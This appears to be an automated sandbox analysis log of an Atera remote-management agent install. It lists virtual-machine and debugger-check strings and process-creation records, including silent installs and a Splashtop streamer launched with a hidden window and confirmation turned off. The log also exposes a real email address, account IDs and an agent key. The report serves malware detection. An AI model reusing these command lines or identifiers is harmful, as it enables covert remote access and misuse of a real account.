                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface0
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2380233543.00000281D6940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                                Source: svchost.exe, 00000029.00000002.3061799701.00000111EEC42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSetPropValue.FriendlyName("VMware Virtual disk");
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2392765473.00000281D69D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicshutdown",|P
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Hyper-V Guest Service InterfacevmicguestinterfaceStoppedqAc
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service0
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2398010393.00000281D6A40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#+
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2773671351.0000029E3A420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware tools
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service0
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                                Source: svchost.exe, 00000029.00000002.3061685112.00000111EEC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                Source: svchost.exe, 00000029.00000002.3061730811.00000111EEC2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0VMware20,1
                                Source: svchost.exe, 00000029.00000002.3061799701.00000111EEC42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .@friendlyname"vmware virtual disk"lll
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,12
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2392765473.00000281D69D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicheartbeat"e|
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Tools
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2773671351.0000029E3A420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMPKQ:
                                Source: rundll32.exe, 00000004.00000002.1699121235.0000000002FE4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E51000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2691314024.000002EF74DD8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2130435176.000001F736BC0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2860089615.0000022052F21000.00000004.00000020.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2454916097.0000022B9AE50000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2976094132.00000153FD49F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2790839667.0000029E3B5E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2320145221.00000281BD910000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStopped
                                Source: svchost.exe, 00000029.00000002.3061852098.00000111EEC78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                                Source: AgentPackageMonitoring.exe, 00000023.00000000.2047773130.000001F71C982000.00000002.00000001.01000000.0000001D.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2088596650.000001F71CD62000.00000002.00000001.01000000.0000001F.sdmp, Atera.AgentPackages.CommonLib.dll2.26.drBinary or memory string: get_IsVirtualMachine
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service0
                                Source: svchost.exe, 00000029.00000002.3061685112.00000111EEC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0usVMwareVirtual disk
                                Source: AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                                Source: svchost.exe, 00000029.00000002.3061799701.00000111EEC42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SetPropValue.Manufacturer("VMware");
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service0
                                Source: svchost.exe, 00000029.00000002.3062836858.00000111EF123000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPACES_PhysicalDisk{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2380233543.00000281D6940000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStopped
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4DF4C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                                Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E5E14 IsDebuggerPresent,__crtUnhandledException,GetCurrentProcess,TerminateProcess,35_2_00007FFDEE3E5E14
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42AFB0 OutputDebugStringA,GetProcessHeap,OutputDebugStringA,GetLastError,lstrlenW,HeapAlloc,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetLastError,OutputDebugStringA,GetModuleFileNameW,lstrlenW,OutputDebugStringA,lstrcatW,lstrcatW,lstrcatW,GetFileAttributesW,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,WinVerifyTrust,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetCurrentThreadId,GetCurrentProcessId,wsprintfW,GetEnvironmentVariableW,SetEnvironmentVariableW,_errno,_errno,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,HeapFree,_snprintf,OutputDebugStringA,35_2_00007FFDEE42AFB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F1910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,35_2_00007FFDEE3F1910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42AFB0 OutputDebugStringA,GetProcessHeap,OutputDebugStringA,GetLastError,lstrlenW,HeapAlloc,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetLastError,OutputDebugStringA,GetModuleFileNameW,lstrlenW,OutputDebugStringA,lstrcatW,lstrcatW,lstrcatW,GetFileAttributesW,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,WinVerifyTrust,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,OutputDebugStringA,OutputDebugStringA,GetModuleHandleW,GetProcAddress,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetEnvironmentVariableW,OutputDebugStringA,GetCurrentThreadId,GetCurrentProcessId,wsprintfW,GetEnvironmentVariableW,SetEnvironmentVariableW,_errno,_errno,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,GetLastError,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,HeapFree,_snprintf,OutputDebugStringA,35_2_00007FFDEE42AFB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3EACD4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00007FFDEE3EACD4
                                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@fazendadoscordeiros.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000P2oAPIAZ" /AgentId="52187e48-563c-468d-9785-3542f81fb412"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgentJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exeJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgentJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible "
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\Temp\SplashtopStreamer.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="contato@fazendadoscordeiros.com.br" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000p2oapiaz" /agentid="52187e48-563c-468d-9785-3542f81fb412"
